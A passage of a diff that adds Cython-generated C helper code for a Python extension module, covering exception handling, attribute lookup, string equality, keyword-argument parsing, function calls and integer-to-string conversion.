Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* ArgTypeTest */ +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact) +{ + __Pyx_TypeName type_name; + __Pyx_TypeName obj_type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + else if (exact) { + #if PY_MAJOR_VERSION == 2 + if ((type == &PyBaseString_Type) && likely(__Pyx_PyBaseString_CheckExact(obj))) return 1; + #endif + } + else { + if (likely(__Pyx_TypeCheck(obj, type))) return 1; + } + type_name = __Pyx_PyType_GetName(type); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "Argument '%.200s' has incorrect type (expected " __Pyx_FMT_TYPENAME + ", got " __Pyx_FMT_TYPENAME ")", name, type_name, obj_type_name); + __Pyx_DECREF_TypeName(type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* CIntToDigits */ +static const char DIGIT_PAIRS_10[2*10*10+1] = { + "00010203040506070809" + "10111213141516171819" + "20212223242526272829" + "30313233343536373839" + "40414243444546474849" + "50515253545556575859" + "60616263646566676869" + "70717273747576777879" + "80818283848586878889" + "90919293949596979899" +}; +static const char DIGIT_PAIRS_8[2*8*8+1] = { + "0001020304050607" + "1011121314151617" + "2021222324252627" + "3031323334353637" + "4041424344454647" + "5051525354555657" + "6061626364656667" + "7071727374757677" +}; +static const char DIGITS_HEX[2*16+1] = { + "0123456789abcdef" + "0123456789ABCDEF" +}; + +/* BuildPyUnicode */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char) { + PyObject *uval; + Py_ssize_t uoffset = ulength - clength; +#if CYTHON_USE_UNICODE_INTERNALS + Py_ssize_t i; +#if CYTHON_PEP393_ENABLED + void *udata; + uval = PyUnicode_New(ulength, 127); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_DATA(uval); +#else + Py_UNICODE *udata; + uval = PyUnicode_FromUnicode(NULL, ulength); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_AS_UNICODE(uval); +#endif + if (uoffset > 0) { + i = 0; + if (prepend_sign) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, 0, '-'); + i++; + } + for (; i < uoffset; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, i, padding_char); + } + } + for (i=0; i < clength; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, uoffset+i, chars[i]); + } +#else + { + PyObject *sign = NULL, *padding = NULL; + uval = NULL; + if (uoffset > 0) { + prepend_sign = !!prepend_sign; + if (uoffset > prepend_sign) { + padding = PyUnicode_FromOrdinal(padding_char); + if (likely(padding) && uoffset > prepend_sign + 1) { + PyObject *tmp; + PyObject *repeat = PyInt_FromSsize_t(uoffset - prepend_sign); + if (unlikely(!repeat)) goto done_or_error; + tmp = PyNumber_Multiply(padding, repeat); + Py_DECREF(repeat); + Py_DECREF(padding); + padding = tmp; + } + if (unlikely(!padding)) goto done_or_error; + } + if (prepend_sign) { + sign = PyUnicode_FromOrdinal('-'); + if (unlikely(!sign)) goto done_or_error; + } + } + uval = PyUnicode_DecodeASCII(chars, clength, NULL); + if (likely(uval) && padding) { + PyObject *tmp = PyNumber_Add(padding, uval); + Py_DECREF(uval); + uval = tmp; + } + if (likely(uval) && sign) { + PyObject *tmp = PyNumber_Add(sign, uval); + Py_DECREF(uval); + uval = tmp; + } +done_or_error: + Py_XDECREF(padding); + Py_XDECREF(sign); + } +#endif + return uval; +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(int)*3+2]; + char *dpos, *end = digits + sizeof(int)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + int remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (int) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (int) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (int) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length 